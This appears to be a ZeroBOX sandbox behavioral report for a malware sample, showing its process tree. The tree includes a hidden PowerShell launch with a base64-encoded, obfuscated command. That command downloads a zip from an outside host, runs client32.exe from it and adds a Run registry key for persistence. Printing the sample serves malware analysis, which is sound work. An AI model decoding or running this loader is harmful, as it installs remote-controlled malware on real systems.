popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • 4556qXbHiTtYxMXnMwXziAARUlvy.exe "C:\Users\test22\AppData\Local\Temp\4556qXbHiTtYxMXnMwXziAARUlvy.exe"

    416

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming/new.ps1"

      2152

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc JgAoACcAYwBkACcAKQAgACQAewBlAE4AdgBgADoAYABBAFAAcABEAEEAdABBAH0AOwAgACQAewBMAGAAaQBuAEsAfQA9ACgAIgB7ADEAfQB7ADQAfQB7ADcAfQB7ADIAfQB7ADUAfQB7ADYAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAHoAaQBwACcALAAnAGgAdAAnACwAJwAvAG0AZQBkAHAAYQAnACwAJwAyADMANAAyADEALgAnACwAJwB0AHAAcwA6ACcALAAnAHUALgBuAGUAdAAvACcALAAnADMAJwAsACcALwAnACkAOwAgACQAewBwAGAAQQBUAEgAfQA9ACQAewBFAE4AdgBgADoAYQBgAFAAUABEAGAAQQBUAEEAfQArACgAKAAoACIAewAwAH0AewAzAH0AewAxAH0AewA0AH0AewAyAH0AIgAgAC0AZgAnAHsAMAB9ACcALAAnAGkAbAAnACwAJwB6AGkAcAAnACwAJwBzACcALAAnAHAALgAnACkAKQAgAC0AZgBbAEMASABBAHIAXQA5ADIAKQA7ACAAJAB7AHAAWgBgAGkAUAB9AD0AJAB7AEUAYABOAHYAOgBhAGAAcABgAFAARABhAFQAQQB9ACsAKAAoACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAgACcAZQBhAG0AUwAzAHIAdgBlACcALAAnAGwAeABXAFQAJwAsACcAcgAnACkAKQAgACAALQByAEUAUABsAGEAYwBFACAAKABbAEMASABhAHIAXQAxADAAOAArAFsAQwBIAGEAcgBdADEAMgAwACsAWwBDAEgAYQByAF0AOAA3ACkALABbAEMASABhAHIAXQA5ADIAKQA7ACAAJgAoACIAewAxAH0AewAwAH0AewAzAH0AewA0AH0AewAyAH0AIgAtAGYAIAAnAHIAdAAtAEIAaQB0ACcALAAnAFMAdABhACcALAAnAGUAcgAnACwAJwBzAFQAcgBhAG4AJwAsACcAcwBmACcAKQAgAC0AUwBvAHUAcgBjAGUAIAAkAHsAbABpAGAATgBrAH0AIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAewBwAEEAYABUAEgAfQA7ACAALgAoACIAewAyAH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAJwB4ACcALAAnAHAAYQBuAGQALQBhAHIAYwBoACcALAAnAGUAJwAsACcAaQB2ACcALAAnAGUAJwApACAALQBwAGEAdABoACAAKAAoACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAGkAbABwAC4AegBpAHAAJwAsACcATQBYAHMAJwAsACcALgBuACcAKQApACAAIAAtAEMAcgBlAHAATABhAGMAZQAnAG4ATQBYACcALABbAEMASABBAHIAXQA5ADIAKQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAUABgAHoAaQBwAH0AOwAgACQAewBGAGAATwBMAEQAfQA9AC4AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACcAZQAnACwAJwBHACcALAAnAHQALQBJAHQAZQBtACcAKQAgACQAewBwAGAAWgBJAFAAfQAgAC0ARgBvAHIAYwBlADsAIAAkAHsARgBgAE8ATABEAH0ALgAiAGEAYABUAFQAcgBpAGIAYABVAHQAYABFAHMAIgA9ACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcASABpACcALAAnAGQAZABlAG4AJwApADsAIAAmACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0AZgAnAG8AJwAsACcAUgBlAG0AJwAsACcALQBJAHQAZQBtACcALAAnAHYAZQAnACkAIAAtAHAAYQB0AGgAIAAkAHsAUABBAGAAVABoAH0AOwAgACYAKAAnAGMAZAAnACkAIAAkAHsAcABgAFoAaQBQAH0AOwAgAC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAdAAnACwAJwBzAHQAYQByACcAKQAgACgAIgB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACcAeABlACcALAAnAC4AJwAsACcAYwBsAGkAZQBuAHQAMwAyACcALAAnAGUAJwApADsAIAAkAHsAZgBzAGAAVAByAH0APQAkAHsAUAB6AGAASQBQAH0AKwAoACgAKAAiAHsAMQB9AHsAMwB9AHsANAB9AHsAMAB9AHsANQB9AHsAMgB9ACIAIAAtAGYAIAAnADMAMgAuACcALAAnAHsAMAB9ACcALAAnAHgAZQAnACwAJwBjAGwAJwAsACcAaQBlAG4AdAAnACwAJwBlACcAKQApACAAIAAtAGYAIAAgAFsAQwBoAEEAUgBdADkAMgApADsAIAAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAgACcATgBlAHcALQBJAHQAZQAnACwAJwBtAFAAJwAsACcAcgBvAHAAZQByAHQAeQAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsAMQAwAH0AewA1AH0AewAwAH0AewAxADMAfQB7ADEAfQB7ADMAfQB7ADgAfQB7ADkAfQB7ADYAfQB7ADQAfQB7ADEAMgB9AHsAMQAxAH0AewAyAH0AewA3AH0AIgAgAC0AZgAgACcAewAwAH0AJwAsACcATwBGAFQAVwBBACcALAAnAG8AbgB7ADAAJwAsACcAUgBFAHsAMAB9AE0AaQBjAHIAbwBzACcALAAnAEMAJwAsACcAOgAnACwAJwAwAH0AJwAsACcAfQBSAHUAbgAnACwAJwBvAGYAdAB7ADAAfQBXAGkAJwAsACcAbgBkAG8AdwBzAHsAJwAsACcASABLAEMAVQAnACwAJwBWAGUAcgBzAGkAJwAsACcAdQByAHIAZQBuAHQAJwAsACcAUwAnACkAKQAtAGYAWwBDAEgAQQBSAF0AOQAyACkAIAAtAE4AYQBtAGUAIAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACcAYQBtACcALAAnAFMAMwByAHYAZQByACcALAAnAFQAZQAnACkAIAAtAFYAYQBsAHUAZQAgACQAewBmAHMAYABUAHIAfQAgACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAFMAJwAsACcAdAByAGkAbgBnACcAKQA7AA==

        2276

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf